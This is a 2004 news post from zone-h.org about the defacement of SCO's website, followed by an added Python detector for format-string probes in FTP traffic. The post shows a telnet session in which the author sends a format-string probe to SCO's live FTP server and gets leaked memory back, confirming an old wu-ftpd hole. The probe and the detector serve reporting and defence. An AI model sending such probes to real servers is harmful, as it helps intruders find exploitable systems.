News from zone-h.org
www.SCO.com defacement:
SyS64738 and Siegfried, Zone-H.org admins
11/29/2004
It has been there since early this morning: instead of the usual SCO logo
(www.sco.com), we can see a cleverly forged one that at first sight
might look like the usual SCO logo but actually contains the words: WE
OWN ALL YOUR CODE, PAY US ALL YOUR MONEY, followed by "hacked by realloc()".
See the mirror at: http://www.zone-h.org/defaced/2004/11/29/www.sco.com/ or
a screenshot: http://www.zone-h.org/files/77/sco.com.jpg
The site had already been defaced yesterday by the same person at
http://www.sco.com/redhat; the original title "Red Hat v. SCO" was changed
to "SCO vs World", with a text proclaiming that SCO had found parts of their
code in Microsoft products:
"SCO vs World
Recently we found parts of our code in almost all Microsoft(R) software. We
want to bring an action against Microsoft(R) and our legal department is
working on that. Parts of code found in in all Microsoft(R) products from
MS-DOS(TM) 2.1 to Microsoft(R) Windows(TM) Longhorn. Currently we are
checking older MS-DOS sources. It's obvious, that all while (1){
do_something; } and for (i = 0; i < 16; i++) loops came from our code. "
The mirror is available here:
http://www.zone-h.org/defaced/2004/11/29/www.sco.com/redhat/
I browsed SCO's website for a bit and found something interesting:
[sam@rhas3 sam]$ telnet ftpput.sco.com 21
Trying 216.250.128.195...
Connected to artemis.sco.com (216.250.128.195).
Escape character is '^]'.
USER 220 artemis FTP server (Version 2.1WU(1)) ready.
USER anonymous
331 Guest login ok, send e-mail address as password.
PASS anonymous@xxx.com
230-Welcome to SCO's older FTP Archive Site
230-
230-All transfers from this archive are logged. To bypass this and all other
230-messages, use a "-" as the first character of your password,
230-e.g. "-your_login@company.COM". See the file README.ftp for information
230-regarding the specific features of this FTP server.
230-
230-
230-Please read the file README
230- it was last modified on Fri Dec 11 14:53:57 1998 - 2179 days ago
230-Please read the file README.OSR5.Supplements
230- it was last modified on Fri May 25 11:55:14 2001 - 1284 days ago
230-Please read the file README.UW7.Supplements
230- it was last modified on Tue Jun 19 15:05:36 2001 - 1259 days ago
230-Please read the file README.UW7_NSC.Supplements
230- it was last modified on Wed Jun 13 13:59:57 2001 - 1265 days ago
230-Please read the file README.download
230- it was last modified on Tue Jun 29 12:22:09 1999 - 1979 days ago
230-Please read the file README.ftp
230- it was last modified on Fri Sep 2 16:44:18 1994 - 3739 days ago
230 Guest login ok, access restrictions apply.
SITE EXEC AAAA%x%x%x%x%x%x%x%x%x%x%x
200-aaaad228588767265736374652f7074662f6578652d61612f63782561617825782578257825
200 (end of 'aaaa%x%x%x%x%x%x%x%x%x%x%x')
^]q
Connection closed.
Surprisingly, it still has a wu-ftpd format string overflow vulnerability, which was discovered in 2000:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573
The hacker most likely broke into sco.com this way.
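The same observation can be turned into a check over captured FTP control traffic. The following is an added example, not part of the original post: it flags commands whose arguments carry printf-style conversion specifiers and tells apart a reply that returns them literally from one that expanded them, as artemis did above. The "C:"/"S:" transcript layout, the function names and the second session are assumptions constructed for illustration.

```python
import re

# printf-style conversion specifier such as %x, %08x, %5$p or %hn
FMT_SPEC = re.compile(r"%(?:\d+\$)?[-+#0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|z|j|t)?[diouxXeEfgGcspn]")

# Constructed sample input: "C:" = client command, "S:" = server reply.
# "artemis" copies the exchange above; "patched-example" is hypothetical.
SESSIONS = {
    "artemis": """\
C: USER anonymous
S: 331 Guest login ok, send e-mail address as password.
C: SITE EXEC AAAA%x%x%x%x%x%x%x%x%x%x%x
S: 200-aaaad228588767265736374652f7074662f6578652d61612f63782561617825782578257825
S: 200 (end of 'aaaa%x%x%x%x%x%x%x%x%x%x%x')
""",
    "patched-example": """\
C: SITE EXEC AAAA%x%x%x
S: 200-aaaa%x%x%x
S: 200 (end of 'aaaa%x%x%x')
""",
}

def specifiers(arg):
    """Conversion specifiers in a command argument; a literal '%%' is not one."""
    return FMT_SPEC.findall(arg.replace("%%", ""))

def classify(session):
    """Return (command, verdict) for each client command carrying specifiers."""
    findings, current = [], None
    for line in session.splitlines():
        side, _, text = line.partition(": ")
        if side == "C":
            verb, _, arg = text.partition(" ")
            if verb.upper() == "SITE":        # SITE EXEC <arg>: drop the sub-command
                arg = arg.partition(" ")[2]
            current = None
            if specifiers(arg):
                current = [text, arg, "probe-only"]
                findings.append(current)
        elif side == "S" and current and current[2] != "expanded":
            body = text[4:]                   # strip the "200-" / "200 " reply code
            prefix = current[1].split("%", 1)[0].lower()
            if prefix and body.lower().startswith(prefix) and len(body) > len(prefix):
                # Specifiers missing from the echo: the server formatted the input
                current[2] = "echoed" if specifiers(body) else "expanded"
    return [(cmd, verdict) for cmd, _, verdict in findings]

if __name__ == "__main__":
    for name, session in SESSIONS.items():
        print(name, classify(session))
```

A verdict of "expanded" means the reply came back with the specifiers replaced by data, which is what the 200- line in the session above shows; "probe-only" means specifiers were sent but the reply gave no usable echo.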